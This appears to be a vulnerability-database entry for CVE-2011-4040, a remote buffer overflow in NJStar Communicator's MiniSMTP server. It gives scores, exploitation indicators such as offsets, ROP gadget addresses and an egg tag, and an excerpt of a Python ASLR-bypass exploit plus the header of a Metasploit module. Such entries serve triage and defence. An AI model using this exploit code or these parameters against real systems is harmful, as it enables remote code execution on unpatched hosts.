CVE-2011-4040
Published: 2011-11-21
CVE-2011-4040: Buffer overflow in MiniSmtp 3.0.11818 in NJStar Communicator allows remote attackers to execute arbitrary code via a crafted packet.
Priority: P267 · Severity: critical · CVSS 2.0 base score: 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit available · EPSS: 65.68% (99.2th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| njstar | njstar_communicator | — | — |
Detection & IOCs (extracted from sources)
Bytes: \x8d\x44\x24\x80\xff\xe0\x90\x90
- The MiniSMTP server listens on TCP port 25 and is vulnerable to a stack buffer overflow triggered by a crafted packet. The overflow offset is 247 bytes before the return address.
- The MiniSMTP application continues to run in the background even after the NJStar Communicator GUI is shut down, meaning the attack surface persists after apparent application closure.
- The Metasploit exploit uses an egg-hunter technique with the tag 'w00t'; network traffic containing this egg tag pattern on port 25 is a strong indicator of exploitation attempts.
- The ASLR-bypass exploit sends four sequential SMTP packets with specific padding lengths (275, 271, 263, 171+22 bytes) and ROP gadget return addresses from the application's own module (0x41122d, 0x41122b) to bypass ASLR on Windows 7.
- The exploit uses EXITFUNC=thread, meaning the spawned shell runs in a thread context; process-level monitoring may not catch process creation directly from the SMTP server process.
- The shellcode in the ASLR-bypass exploit launches calc.exe (bytes 0x63 0x61 0x6C 0x63 / 'calc' and 0x2E 0x65 0x78 0x65 / '.exe') as a proof-of-concept; production payloads would substitute this shellcode at the same offset.
- The Metasploit module targets Windows XP SP1/SP2/SP3 and Windows Server 2003 SP0 using hardcoded JMP ESP addresses in kernel32.dll, ntdll.dll, and user32.dll. These addresses are version-specific and will not work on patched or different OS builds.
- The ASLR-bypass exploit targets Windows 7 Ultimate and uses ROP gadgets from the application's own non-ASLR module at fixed addresses (0x41122d, 0x41122b). This only works if the NJStar module is not ASLR-enabled.
- The null byte (0x00) is a bad character for the payload; any shellcode or payload used must avoid null bytes.
No detection rules found.
Exploit-DB: NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass) (exploitdb, 2011-12-03, CVE-2011-4040)
```python
# Exploit Title: NJStar Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
# Date: 02/12/11
# Author: Zune - Julian Pulido
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.0
# Build: 11818 and previous
# Tested on: Windows 7 Ultimate
# CVE:2011-4040
#! /usr/local/bin/python
import socket
import time
carriage = chr(0xd)
#######################################
Padding1 = chr(0x31) * 275
Jump = '\x8d\x44\x24\x80\xff\xe0\x90\x90'
Junk1 = chr(0x90) * 4
return1 = '\x2d\x12\x41'  # pop retn
egg1 = Padding1 + Jump + Junk1 + return1 + carriage
#######################################
Padding2 = chr(0x32) * 271
return2 = '\x2b\x12\x41'  # pop pop pop retn
egg2 = Padding2 + return2 + carriage
#######################################
```
#######################################
Exploit-DB: NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit) (exploitdb, 2011-10-31, CVE-2011-4040)
```ruby
##
# Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
# Date: 10/31/2011
# Author: Dillon Beresford
# Twitter: https://twitter.com/#!/D1N
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.00 and prior
# Build: 11818 and prior
# Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0
# CVE : NONE
# Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
# manils, d0tslash, mublix, halsten, and everyone at AHA!
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
```
Metasploit: NJStar Communicator 3.00 MiniSMTP Buffer Overflow
This module exploits a stack buffer overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple NJStar products, and will continue to run in the background even if the software is already shut down. According to the vendor's testimonials, NJStar software is also used by well known companies such as Siemens, NEC, Google, Yahoo, eBay; government agencies such as the FBI, Department of Justice (HK); as well as a long list of universities such as Yale, Harvard, University of Tokyo, etc.
No writeups or analysis indexed.